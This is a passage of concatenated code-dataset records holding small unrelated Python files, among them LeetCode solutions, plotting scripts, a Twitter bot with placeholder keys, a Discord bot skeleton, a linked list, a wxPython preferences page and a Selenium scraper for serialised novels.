)\r\n\r\n # 3. Create an oval that is centered on the canvas and\r\n # is 50% as wide and 50% as high as the canvas.\r\n self.objects.append( canvas.create_oval(\r\n int( 0.25 * int( canvas.cget( \"width\" ) ) ),\r\n int( 0.25 * int( canvas.cget( \"height\" ) ) ),\r\n int( 0.75 * int( canvas.cget( \"width\" ) ) ),\r\n int( 0.75 * int( canvas.cget( \"height\" ) ) ) ) )\r\n\r\n def redisplay( self, canvas, event ) :\r\n if self.objects :\r\n canvas.coords(self.objects[ 0 ], 0, 0, event.width, event.height )\r\n canvas.coords(self.objects[ 1 ], event.width, 0, 0, event.height )\r\n canvas.coords(self.objects[ 2 ],\r\n int( 0.25 * int( event.width ) ),\r\n int( 0.25 * int( event.height ) ),\r\n int( 0.75 * int( event.width ) ),\r\n int( 0.75 * int( event.height ) ) )\r\n\r\n #----------------------------------------------------------------------\r\n\r\n\r\n def create_figure(self,canvas,X,Y,P1,P2,P3,window,viewportPoints):\r\n canvas.delete(\"all\")\r\n\r\n self.objects.append(\r\n canvas.create_polygon(float(viewportPoints[0])*float(canvas.cget(\"width\")), float(viewportPoints[1])*\r\n float(canvas.cget(\"height\")),float(viewportPoints[0])*float(canvas.cget(\"width\")),\r\n float(viewportPoints[3]) *float(canvas.cget(\"height\")),float(viewportPoints[2])*\r\n float(canvas.cget(\"width\")),float(viewportPoints[3])*\r\n float(canvas.cget(\"height\")),float(viewportPoints[2])*float(canvas.cget(\"width\")),\r\n float(viewportPoints[1])*float(canvas.cget(\"height\")),fill='',outline='black'))\r\n\r\n Sx = (float(viewportPoints[2]) - float(viewportPoints[0]))/(float(window[2]) - float(window[0]))\r\n Sy = (float(viewportPoints[3]) - float(viewportPoints[1]))/(float(window[3]) - float(window[1]))\r\n height = int(canvas.cget(\"height\"))\r\n\r\n for i in range(len(P1)):\r\n dx1 = float(X[ int(P1[i])-1]) - float(window[0])\r\n dy1 = float(Y[ int(P1[i]) -1]) -float(window[1])\r\n\r\n dx2 = float(X[ int(P2[i])-1]) - float(window[0])\r\n dy2 = float(Y[ int(P2[i]) -1]) -float(window[1])\r\n\r\n dx3 = float(X[ int(P3[i])-1]) - float(window[0])\r\n dy3 = float(Y[ int(P3[i]) -1]) -float(window[1])\r\n\r\n\r\n X1Prime = (dx1 * Sx) + float(viewportPoints[0])\r\n Y1Prime = height -(((dy1 * Sy) + 
float(viewportPoints[1])) * height)\r\n X2Prime = (dx2 * Sx) + float(viewportPoints[0])\r\n Y2Prime = height-(((dy2 * Sy) + float(viewportPoints[1])) * height)\r\n X3Prime = (dx3 * Sx) + float(viewportPoints[0])\r\n Y3Prime = height -(((dy3 * Sy) + float(viewportPoints[1])) * height)\r\n\r\n self.objects.append(canvas.create_polygon(X1Prime * int(canvas.cget(\"width\")),Y1Prime,X2Prime * int(canvas.cget(\"width\")),Y2Prime,X3Prime* int(canvas.cget(\"width\")),Y3Prime,fill='white', outline='black'))\r\n\r\n\r\n","sub_path":"Python/Graphics/Graphics_asisgnment1/myGraphics.py","file_name":"myGraphics.py","file_ext":"py","file_size_in_byte":4335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"351701124","text":"#coding:utf-8\n\nclass Solution(object):\n\tdef binarysearch_standard(self, array, target):\n\t\t# array = [10, 14, 19, 26, 27, 31, 33, 35, 42, 44]\n\t\t# target = 31\n\t\tleft, right = 0, len(array)-1\n\t\twhile left <= right:\n\t\t\tmid = int((left + right) / 2) \n\t\t\tif array[mid] == target:\n\t\t\t\treturn mid\n\t\t\telif array[mid] > target:\n\t\t\t\tright = mid - 1\n\t\t\telse:\n\t\t\t\tleft = mid + 1\n\t# https://leetcode.com/problems/sqrtx/\n\tdef mySqrt(self, x):\n\t\t\"\"\"\n\t\t:type x: int\n\t\t:rtype: int\n\t\t\"\"\"\n\t\tif x==0 or x==1:\n\t\t\treturn x\n\t\tleft, right = 1, x\n\t\twhile left <= right:\n\t\t\tmid = int((left + right) / 2)\n\t\t\tif mid == int(x / mid):\n\t\t\t\treturn mid\n\t\t\telif mid > int(x / mid):\n\t\t\t\tright = mid - 1\n\t\t\telse:\n\t\t\t\tleft = mid + 1\n\t\t\t\tres = mid\n\t\treturn res\n\tdef mySqrt_newton(self, x):\n\t\tres = x\n\t\twhile res*res > x:\n\t\t\tres = int((res + x / res) / 2)\n\t\treturn res\n\tdef mySqrt_double(self, x, epision=1e-7):\n\t\tleft, right = 0, x\n\t\twhile abs(left-right) > epision:\n\t\t\tmid = (left+right) / 2\n\t\t\tif mid > x / mid:\n\t\t\t\tright = mid\n\t\t\telse:\n\t\t\t\tleft = mid\n\t\treturn left\n\t#https://leetcode.com/problems/valid-perfect-square/\n\tdef isPerfectSquare(self, num):\n\t\t\"\"\"\n\t\t:type num: int\n\t\t:rtype: bool\n\t\t\"\"\"\n\t\tleft, right = 0, num\n\t\twhile left <= right:\n\t\t\tmid = int((left + right) / 2)\n\t\t\tif mid * mid == num:\n\t\t\t\treturn True\n\t\t\telif mid * mid > num:\n\t\t\t\tright = mid - 1\n\t\t\telse:\n\t\t\t\tleft = mid + 1\n\t\treturn False\n\n\n\ns = Solution()\narray = [10, 14, 19, 26, 27, 31, 33, 35, 42, 44]\ntarget = 31\nres = s.binarysearch_standard(array, target)\nprint(\"res = \", res)\ntest_seq = [0, 1, 3, 8, 9, 20]\nres_seq = [s.mySqrt(i) for i in test_seq]\nprint(\"res = \", res_seq)\nres_seq = [s.mySqrt_newton(i) for i in test_seq]\nprint(\"res = \", res_seq)\nres_seq = [s.mySqrt_double(i) for i in test_seq]\nprint(\"res = \", res_seq)\nres_seq = [s.isPerfectSquare(i) for i in test_seq]\nprint(\"res = \", res_seq)\n\n\n","sub_path":"34_二分查找/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"378461754","text":"import matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\n\nf = open('with_prftch.csv', 'r')\nmat1 = []\nfor lines in f:\n mat1.append(lines.split(','))\n\nf = open('no_prftch.csv', 'r')\nmat2 = []\nfor lines in f:\n mat2.append(lines.split(','))\n\nf = open('no_hw_prftch.csv', 'r')\nmat3 = []\nfor lines in f:\n mat3.append(lines.split(','))\n\naddrs = []\n\nfor row in mat1[1:]:\n addrs.append(row[0])\n\nkey = 0\n\nvalues1 = 
[]\nvalues2 = []\nvalues3 = []\n\nfor row in mat1[1:]:\n values1.append(float(row[key+1]))\n\nfor row in mat2[1:]:\n values2.append(float(row[key+1]))\n\nfor row in mat3[1:]:\n values3.append(float(row[key+1]))\n\nplt.plot(range(1,3279), values1, 'r', label='With Prefetching')\nplt.plot(range(1,3279), values2, 'b', label='Without any Prefetching')\nplt.plot(range(1,3279), values3, 'g', label='Without Hardware Prefetching')\nplt.title('Comparison of data for key \"0\"')\nplt.xlabel('Addresses')\nplt.ylabel('Ratio: #cache_hits / #key_pressed')\n'''\nred_patch = mpatches.Patch(color='red', label='With Prefetching')\nblue_patch = mpatches.Patch(color='blue', label='Without any Prefetching')\ngreen_patch = mpatches.Patch(color='green', label='Without Hardware Prefetching')\nplt.legend(handles=[red_patch, blue_patch,green_patch])\n'''\n\nleg = plt.legend(loc='upper right', prop={'size':14})\n\nfor l in leg.get_lines():\n\tl.set_alpha(1)\n\tl.set_marker('.')\nplt.show()\n","sub_path":"profiling/linux_low_frequency_example/data_files/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"277246241","text":"#!/usr/bin/env python\nimport sys\nimport os\nimport random\nfrom twython import Twython\n\nCONSUMER_KEY = 'TYPE_YOUR_CONSUMER_KEY_HERE_INSTEAD_OF_THIS_PLACEHOLDER_TEXT'\nCONSUMER_SECRET = 'TYPE_YOUR_CONSUMER_SECRET_HERE_INSTEAD_OF_THIS_PLACEHOLDER_TEXT'\nACCESS_KEY = 'TYPE_YOUR_ACCESS TOKEN_HERE_INSTEAD_OF_THIS_PLACEHOLDER_TEXT'\nACCESS_SECRET = 'TYPE_YOUR_ACCESS_TOKEN_SECRET_HERE_INSTEAD_OF_THIS_PLACEHOLDER_TEXT'\n\n__location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))\n\napi = Twython(CONSUMER_KEY,CONSUMER_SECRET,ACCESS_KEY,ACCESS_SECRET) \n\ndef randomTweet():\n try:\n tweetsFile = open(os.path.join(__location__,'tweets.txt'),'r')\n tweetsList = tweetsFile.readlines()\n tweetsFile.close()\n randomChoice = random.randrange(len(tweetsList))\n print (tweetsList[randomChoice]) #For debugging only\n api.update_status(status=tweetsList[randomChoice])\n return None\n except IOError:\n return None \n\t\t\nrandomTweet()\n","sub_path":"twitterbot.py","file_name":"twitterbot.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"292328482","text":"from core.models import City\nfrom django import template\nfrom django.db.models import Q\nfrom support.models import Support\nfrom quicktag.template.quicktag import quicktag\n\nregister = template.Library()\n\n@register.tag\n@quicktag(takes_context=True)\ndef get_random_support(context,var_name='random_support'):\n support = Support.objects.all().order_by('?')\n context[var_name] = support.count() and support[0] or None\n return ''\n \n@register.tag\n@quicktag(takes_context=True)\ndef get_support(context,var_name='support_list',exclude_id=None):\n supports = Support.objects.all()\n if exclude_id:\n supports = supports.exclude(id=exclude_id)\n context[var_name] = supports\n return ''\n","sub_path":"ssemcarne/support/templatetags/support_tags.py","file_name":"support_tags.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"260532351","text":"import os\nimport gzip\nimport pickle\nimport numpy as np\nfrom PIL import Image\n\n\ndef pickle_pngs(directory, destination_path):\n memories = []\n file_names = [file_name for 
file_name in os.listdir(directory) if file_name.endswith('.png')]\n file_names.sort()\n for i, file_name in enumerate(file_names):\n if i % 1000 == 0:\n print('converted {} / {} images'.format(i, len(file_names)))\n img = Image.open(directory + file_name)\n img.load()\n array = np.asarray(img)\n memories.append({'image': array, 'sensor_angles': [0, 0, 0, 0]})\n with gzip.open(destination_path, 'wb') as destination_file:\n pickle.dump(memories, destination_file, 2)\n\n\ndef create_pngs(pkl_file_path, destination_dir):\n print('opening file...')\n with gzip.open(pkl_file_path) as src_file:\n print('loading images...')\n memories = pickle.load(src_file, encoding=\"bytes\")\n print('extracting {} images..'.format(len(memories)))\n for i, memory in enumerate(memories):\n if i % 100 == 0:\n print('extracted {} / {} images'.format(i, len(memories)))\n name = destination_dir + \"nao_img_\" + str(i).zfill(6) + \".png\"\n image = memory[b'image'][:, :, ::-1] # convert from BGR to RGB\n Image.fromarray(image).save(name)\n\n\ndef pickle_arrays(directory, destination_path):\n memories = []\n file_names = [file_name for file_name in os.listdir(directory) if file_name.endswith('.npy')]\n file_names.sort()\n for i, file_name in enumerate(file_names):\n if i % 1000 == 0:\n print('converted {} / {} images'.format(i, len(file_names)))\n array = np.load(directory + file_name)\n memories.append({'image': array, 'sensor_angles': [0, 0, 0, 0]})\n print('converted all {} images'.format(len(file_names)))\n print('dumping to pickle file...')\n with gzip.open(destination_path, 'wb') as destination_file:\n pickle.dump(memories, destination_file, 2)\n\n\nif __name__ == \"__main__\":\n # create_pngs(pkl_file_path=\"../data/nao_raw/agency_1b_original_19to35.pkl\",\n # destination_dir=\"../data/nao_raw/tmp/\")\n # pickle_pngs('../out/css_nao_flowintensity/', '../grey400_flow_intensity.pkl')\n pickle_arrays('../out/css_nao_fromscratch/', '../grey400_flow_fromscratch.pkl')\n","sub_path":"src/nao_img_util.py","file_name":"nao_img_util.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"34680350","text":"# https://github.com/vgenov-py/T-522/blob/master/pokemon.md\n\nimport random\nfrom funs import *\n\nelements = [\"fire\", \"grass\", \"water\"]\n# fire > grass\n# grass > water\n# water > fire\n# if > 1.5 // if < 0.5\n# fire grass water\n# Fire 1 1.5 0.5\n# GRass 0.5 1 1.5\n# water 1.5 0.5 1\n\nclass Pokemon:\n\n count = 0\n\n @classmethod\n def set_count(cls):\n cls.count += 1\n\n def __init__(self, name, element, HP):\n self.name = name\n self.element = element\n self.HP = HP\n self.attacks = []\n self.is_alive = True\n Pokemon.set_count()\n\n def __str__(self):\n if self.is_alive == True:\n return f\"name: {self.name}\\ntype: {self.element}\\nHP: {self.HP}\\nattacks: {self.attacks}\"\n else:\n return f\"El pokemon {self.name} fue derrotado...\"\n\n def learn(self, attack):\n return self.attacks.append(attack)\n\n def recive_damage(self, attack):\n damage = random.randint(0, attack.damage)\n print(attack.element)\n print(self.element)\n if self.element == attack.element:\n damage_final = damage\n self.HP -= damage_final\n else:\n if attack.element == \"fire\":\n if self.element == \"grass\":\n damage_final = damage *1.5\n self.HP -= damage_final\n elif self.element == \"water\":\n damage_final = damage *0.5\n self.HP -= damage_final\n elif attack.element == \"grass\":\n if self.element == \"water\":\n damage_final = damage 
*1.5\n self.HP -= damage_final\n elif self.element == \"fire\":\n damage_final = damage *0.5\n self.HP -= damage_final\n elif attack.element == \"water\":\n if self.element == \"fire\":\n damage_final = damage *1.5\n self.HP -= damage_final\n elif self.element == \"grass\":\n damage_final = damage *0.5\n self.HP -= damage_final\n print(f\"{self.name} recibe un daño de: {damage_final}\")\n if self.HP <= 0:\n self.is_alive = False\n\nclass Attack:\n def __init__(self, name, element, damage):\n self.name = name\n self.element = element\n self.damage = damage\n\n def __str__(self):\n return f\"{self.name}\"\n\n def __repr__(self):\n return f\"{self.name}: {self.damage}\"\n\n# elements = [\"fire\", \"grass\", \"water\"]\n# POKEMONS\ncharmander = Pokemon(\"Charmander\", elements[0], 120)\nsquirtle = Pokemon(\"Squirtle\", elements[2], 140)\nbulbasaur = Pokemon(\"Bulbasaur\", elements[1], 160)\nvulpix = Pokemon(\"Vulpix\", elements[0], 100)\ngolduck = Pokemon(\"Golduck\", elements[2], 150)\nmeganium = Pokemon(\"Meganium\", elements[1], 170)\n\n# ATTACKS\nflamethrower = Attack(\"Flamethrower\", elements[0], 40)\nrazor_leaf = Attack(\"Razor_leaf\", elements[1], 25)\nsurf = Attack(\"Surf\", elements[2], 35)\n\ncharmander.learn(flamethrower)\ncharmander.learn(razor_leaf)\nbulbasaur.learn(razor_leaf)\nbulbasaur.learn(surf)\nsquirtle.learn(surf)\nvulpix.learn(flamethrower)\ngolduck.learn(surf)\ngolduck.learn(razor_leaf)\nmeganium.learn(razor_leaf)\n\npokemons = [charmander, squirtle, bulbasaur, vulpix, golduck, meganium]\nprint(Pokemon.count)","sub_path":"pokemons.py","file_name":"pokemons.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"384949063","text":"from zoundry.appframework.ui.prefs.appprefsdialog import ZApplicationPreferencesPrefPage\r\nfrom zoundry.appframework.ui.widgets.dialogs.standarddialogs import ZShowInfoMessage\r\nfrom zoundry.blogapp.constants import IZUserPrefsDefaults\r\nfrom zoundry.blogapp.constants import IZBlogAppUserPrefsKeys\r\nfrom zoundry.blogapp.messages import _extstr\r\nimport wx\r\n\r\n# ------------------------------------------------------------------------------------\r\n# A user preference page impl for the General user prefs section.\r\n# ------------------------------------------------------------------------------------\r\nclass ZTrayPreferencePage(ZApplicationPreferencesPrefPage):\r\n\r\n def __init__(self, parent):\r\n ZApplicationPreferencesPrefPage.__init__(self, parent)\r\n # end __init__()\r\n\r\n def createWidgets(self):\r\n self.staticBox = wx.StaticBox(self, wx.ID_ANY, _extstr(u\"trayprefpage.TrayIcon\")) #$NON-NLS-1$\r\n self.alwaysShowTrayIconCB = wx.CheckBox(self, wx.ID_ANY, _extstr(u\"trayprefpage.AlwaysShowTrayIcon\")) #$NON-NLS-1$\r\n self.hideAppWindowCB = wx.CheckBox(self, wx.ID_ANY, _extstr(u\"trayprefpage.HideAppWindowOnMinimize\")) #$NON-NLS-1$\r\n # end createWidgets()\r\n\r\n def bindWidgetEvents(self):\r\n self.Bind(wx.EVT_CHECKBOX, self.onAlwaysShowCB, self.alwaysShowTrayIconCB)\r\n self.Bind(wx.EVT_CHECKBOX, self.onHideWhenMinCB, self.hideAppWindowCB)\r\n # end bindWidgetEvents()\r\n\r\n def populateWidgets(self):\r\n isAlwaysShow = self.session.getUserPreferenceBool(IZBlogAppUserPrefsKeys.SYSTRAY_ALWAYS_SHOW, IZUserPrefsDefaults.SYSTRAY_ALWAYS_SHOW)\r\n isHideWhenMin = self.session.getUserPreferenceBool(IZBlogAppUserPrefsKeys.SYSTRAY_HIDE_WHEN_MINIMIZED, IZUserPrefsDefaults.SYSTRAY_HIDE_WHEN_MINIMIZED)\r\n\r\n 
self.alwaysShowTrayIconCB.SetValue(isAlwaysShow)\r\n        self.hideAppWindowCB.SetValue(isHideWhenMin)\r\n    # end populateWidgets()\r\n\r\n    def layoutWidgets(self):\r\n        boxSizer = wx.StaticBoxSizer(self.staticBox, wx.VERTICAL)\r\n        boxSizer.Add(self.alwaysShowTrayIconCB, 0, wx.EXPAND | wx.ALL, 3)\r\n        boxSizer.Add(self.hideAppWindowCB, 0, wx.EXPAND | wx.ALL, 3)\r\n\r\n        sizer = wx.BoxSizer(wx.VERTICAL)\r\n        sizer.AddSizer(boxSizer, 0, wx.EXPAND | wx.ALL, 5)\r\n        self.SetAutoLayout(True)\r\n        self.SetSizer(sizer)\r\n        self.Layout()\r\n    # end layoutWidgets()\r\n\r\n    def onAlwaysShowCB(self, event):\r\n        isAlwaysShow = self.alwaysShowTrayIconCB.GetValue()\r\n        self.session.setUserPreference(IZBlogAppUserPrefsKeys.SYSTRAY_ALWAYS_SHOW, isAlwaysShow)\r\n        event.Skip()\r\n    # end onAlwaysShowCB()\r\n\r\n    def onHideWhenMinCB(self, event):\r\n        isHideApp = self.hideAppWindowCB.GetValue()\r\n        self.session.setUserPreference(IZBlogAppUserPrefsKeys.SYSTRAY_HIDE_WHEN_MINIMIZED, isHideApp)\r\n        event.Skip()\r\n    # end onHideWhenMinCB()\r\n\r\n    def apply(self):\r\n        ZShowInfoMessage(self, _extstr(u\"trayprefpage.RequiredRestartMessage\"), _extstr(u\"trayprefpage.RequiredRestartTitle\")) #$NON-NLS-2$ #$NON-NLS-1$\r\n        return ZApplicationPreferencesPrefPage.apply(self)\r\n    # end apply()\r\n\r\n# end ZTrayPreferencePage\r\n","sub_path":"src/python/zoundry/blogapp/ui/prefs/prefpages/trayprefpage.py","file_name":"trayprefpage.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
{"seq_id":"611543909","text":"\"\"\"\r\nApplied Artificial Intelligence (PUC/PR)\r\nCourse: Algorithmic Reasoning\r\nPriscilla Bomfim Domingues\r\n\"\"\"\r\n\r\n# (a) implement an algorithm that creates a matrix with dimensions 3 x 3 using lists (a list of lists).\r\n# The program must insert only the values zero (0) and one (1) into the matrix. The diagonal of this matrix must be filled\r\n# with the value one (1) and the rest with the value zero (0). 
The program must also print the matrix after it is created.\r\n# E.g.: [ [ 1, 0, 0 ],\r\n#        [ 0, 1, 0 ],\r\n#        [ 0, 0, 1 ] ]\r\n\r\nm = []\r\ni = 0\r\n\r\nfor x in range(3):\r\n    m.append([0]*3)\r\n    m[i][i] = 1\r\n    i += 1\r\n\r\nprint(m)\r\n\r\nprint()\r\n# (b) implement the same algorithm to create a 3 x 3 matrix using the dictionary structure.\r\n# E.g.: { 0: { 0: 1, 1: 0, 2: 0 },\r\n#        1: { 0: 0, 1: 1, 2: 0 },\r\n#        2: { 0: 0, 1: 0, 2: 1 }}\r\n\r\n\r\nm2 = {}\r\n\r\nfor x in range(3):\r\n    m2[x] = {}\r\n    for y in range(3):\r\n        if x == y:\r\n            m2[x][y] = 1\r\n        else:\r\n            m2[x][y] = 0\r\nprint(m2)\r\n","sub_path":"matrizes.py","file_name":"matrizes.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
{"seq_id":"648487566","text":"# Leetcode: Pass\n# TC: O(n), SC: O(n), considering the new candies array created\n# 1) initialize a candies array the size of ratings with 1, as each child must have at least 1 candy\n# 2) iterate from the left to satisfy \"Children with a higher rating get more candies than their neighbors\"\n#    and add +1\n# 3) similar to 2, iterate from the right to check and update to satisfy the condition\n\nclass Solution:\n    def candy(self, ratings: List[int]) -> int:\n        # 1\n        candies = [1]*len(ratings)\n        # 2\n        for i in range(1, len(ratings)):\n            if ratings[i] > ratings[i-1]: candies[i] = candies[i-1]+1\n        # 3\n        for i in range((len(ratings)-2), -1, -1):\n            if ratings[i] > ratings[i+1]: candies[i] = max(candies[i], candies[i+1]+1)\n        return sum(candies)\n","sub_path":"candy.py","file_name":"candy.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
{"seq_id":"136981744","text":"\nimport discord,json,datetime\nfrom discord.ext import commands\n\nclass helpcommand(commands.DefaultHelpCommand):\n    def __init__(self):\n        super().__init__()\n        self.commands_heading = \"コマンド:\"\n        self.no_category = \"その他\"\n        self.command_attrs[\"help\"] = \"へるぷ\"\n\n    def get_ending_note(self):\n        return (\"Github:https://github.com/iemike3/jinroubot\")\n\nbot = commands.Bot(command_prefix=\"j.\",help_command=helpcommand())\n\nwith open(\"config.json\",\"r\") as f:\n    config = json.load(f)\n\n@bot.event\nasync def on_ready():\n    print(\"---------------------\")\n    print(f\"User:{bot.user}\")\n    print(f\"Login Time:{datetime.datetime.now()}\")\n    print(\"---------------------\")\n\nclass WereWolf_Main(commands.Cog,name=\"人狼コマンド\"):\n    def __init__(self, bot):\n        super().__init__()\n        self.bot = bot\n\n    @commands.command()\n    async def start(self,ctx):\n        await ctx.send(\"start command run\")\n\n    @commands.command()\n    async def stop(self,ctx):\n        await ctx.send(\"stop command end\")\n\nbot.add_cog(WereWolf_Main(bot=bot))\nbot.run(config[\"token\"])\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
{"seq_id":"554051402","text":"import matplotlib.pyplot as plt\nimport sys\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\n\n# Range for RDD is 1 - 5 (0.2 - 1.0)\n# Collect for each size, for each algorithm the result\nf = open('WorkLoad.csv', 'r')\n\n# Read all lines, saving in an array\ndata = f.readlines()\n\n# Initialize the result array, and a separate array to count the amount of instances.\n\n\n#\nresult = {}\nfor i in range(0, 5):\n    for j in 
range(0, 5):\n result[i, j] = 0\n # print(i, j)\n\n# arr = [[] for i in range(5)]\narr = []\ncolumn = 5\nfor j in range(1, column):\n arr.append([])\n\ni = 0\n# Loop through all the data\n\nfor entry in data:\n # print(\"i= \", i)\n if (len(entry) > 1):\n entry_data = entry[1:len(entry) - 1].split(\",\")\n # print(entry_data)\n\n # for j in range(0,len(entry_data)) :\n # result[i, j] = int(entry_data[j])\n # print(result[i, j])\n\n count = 0\n flag = sys.maxsize\n\n\n for ele in entry_data:\n #\n # print(\"ele= \", ele)\n arr[count].append(int(ele))\n # print(arr[count][i])\n count += 1\n\n while count < 4:\n arr[count].append(0)\n count += 1\n\n i += 1\n\nprint(arr[0])\n\nx = list(range(0, len(arr[0])))\n\n# print(x)\n\nflag=0\nfor ele in arr[2]:\n if ele != 0:\n break\n flag+=1\n\nflag2=2\nfor ele in arr[3]:\n if ele != 0:\n break\n flag2+=1\nax = plt.gca()\nax.tick_params(axis='x', which='major', labelsize=35)\nax.tick_params(axis='y', which='major', labelsize=35)\n\nplt.plot((flag-1, flag-1), (0, 180), '--')\nplt.plot((flag2-1, flag2-1), (0, 180), '--')\n\nplt.plot(x, arr[0],label='Node 1')\nplt.plot(x, arr[1],label='Node 2')\nplt.plot(x, arr[2],label='Node 3')\nplt.plot(x, arr[3],label='Node 4')\n\nplt.title('Auto Scaling Up',size=35)\nplt.xlabel('Time',size=35)\nplt.ylabel('Number of Tasks on Each Node',size=35)\nplt.legend(bbox_to_anchor=(1.05, 1), loc='upper right', borderaxespad=0.,prop={'size':25})\n\nplt.show()\n","sub_path":"pythondraw/cloudComputingGraph.py","file_name":"cloudComputingGraph.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"489131945","text":"## begin license ##\n#\n# \"Gustos-Meresco\" is a set of Gustos components for Meresco based projects.\n#\n# Copyright (C) 2014-2015, 2021 Seecr (Seek You Too B.V.) https://seecr.nl\n# Copyright (C) 2014-2015, 2021 Stichting Kennisnet https://www.kennisnet.nl\n# Copyright (C) 2021 Data Archiving and Network Services https://dans.knaw.nl\n# Copyright (C) 2021 SURF https://www.surf.nl\n# Copyright (C) 2021 The Netherlands Institute for Sound and Vision https://beeldengeluid.nl\n#\n# This file is part of \"Gustos-Meresco\"\n#\n# \"Gustos-Meresco\" is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# \"Gustos-Meresco\" is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with \"Gustos-Meresco\"; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n#\n## end license ##\n\nfrom meresco.core import Transparent\nfrom meresco.components.log import collectLog\n\nclass ClauseLog(Transparent):\n    def executeQuery(self, query, **kwargs):\n        clauses = 0\n        for expr in query.iter():\n            if not expr.operator:\n                clauses += 1\n        collectLog(dict(cqlClauses=clauses))\n        response = yield self.any.executeQuery(query=query, **kwargs)\n        return response\n\n","sub_path":"gustos/meresco/clauselog.py","file_name":"clauselog.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
{"seq_id":"134419465","text":"# Node class\nclass Node:\n    # Function to initialize the node object\n    def __init__(self, value):\n        self.val = value  # Assign value\n        self.next = None  # Initialize next as null\n\n\n# Linked List class\nclass SingleListNode:\n    # Function to initialize the Linked List\n    def __init__(self):\n        self.head = None\n\n    # Function to traverse until it reaches the end of the linked list\n    # @return last Node\n    def traverse(self):\n        if self.head == None:\n            return None\n\n        if self.head.next == None:\n            return self.head\n\n        temp = self.head\n        while temp.next != None:\n            temp = temp.next\n\n        return temp\n\n    # Function to insert at the last Node\n    def insertLast(self, value):\n        lastNode = self.traverse()\n\n        target = Node(value)\n        if lastNode != None:\n            lastNode.next = target\n        else:\n            # The list was empty, so the new node becomes the head\n            self.head = target\n\n        return target\n\n    # Function to insert at the beginning (before head)\n    def insert(self, value):\n        firstNode = Node(value)\n        firstNode.next = self.head\n        self.head = firstNode\n\n        return self.head\n\n    # Function to find a Node with value, then return the reference to that Node\n    # @return : previous, target\n    def search(self, value):\n        # If linked list is empty, return None\n        if self.head == None:\n            return None, None\n\n        # If head contains the value\n        if self.head.val == value:\n            return None, self.head\n\n        # Try to find the Node\n        temp = self.head\n        while temp.next != None:\n            if temp.next.val == value:\n                return temp, temp.next\n            temp = temp.next\n\n        # No such Node in the linked list\n        return None, None\n\n    # Function to delete a Node with value, then return the reference of that Node\n    # @return deleted Node\n    def delete(self, value):\n        # If linked list is empty\n        if self.head == None:\n            return None\n        # If head is the target\n        if self.head.val == value:\n            target = self.head\n            self.head = self.head.next\n            return target\n\n        # Iterate through linked list to find target Node\n        prev, target = self.search(value)\n\n        # If found target, delete\n        if target != None:\n            prev.next = target.next\n            return target\n\n        # If not found, return None\n        return None\n\n","sub_path":"python/ds/LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
{"seq_id":"621379162","text":"\"\"\"\nScrape novels from the Qianbi (Pencil) novel site\n\"\"\"\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\n\ndef get_page_content(content=None):\n    global title, file\n    if content is None:\n        content = []\n    html = driver.page_source\n    soup = BeautifulSoup(html, 'lxml')\n\n    if title is None:\n        title = soup.select('#mlfy_main_text h1')[0].string\n        
file.write(title)\n\n read_content = soup.find_all(class_='read-content')\n [s.extract() for s in read_content[0].findAll('dt')]\n [s.extract() for s in read_content[0].findAll('center')]\n content.extend(list(read_content[0].strings))\n\n if soup.select('.mlfy_page a')[4].string == '下一章':\n print(title)\n for i in content:\n file.write(i)\n driver.find_element_by_link_text(u'下一章').click()\n title = None\n get_page_content()\n\n elif soup.select('.mlfy_page a')[4].string == '下一页':\n driver.find_element_by_link_text(u'下一页').click()\n get_page_content(content)\n\n elif soup.select('.mlfy_page a')[4].string == '末章节':\n for i in content:\n file.write(i)\n\n\noption = Options()\noption.add_argument('--headless')\noption.add_argument('--disable-gpu')\ndriver = webdriver.Chrome(\n executable_path=r'C:\\Users\\Administrator\\AppData\\Local\\Google\\Chrome\\Application\\chromedriver.exe',\n options=option)\ndriver.get('https://www.x23qb.com/book/8311/54153260.html')\ntitle = None\nfile 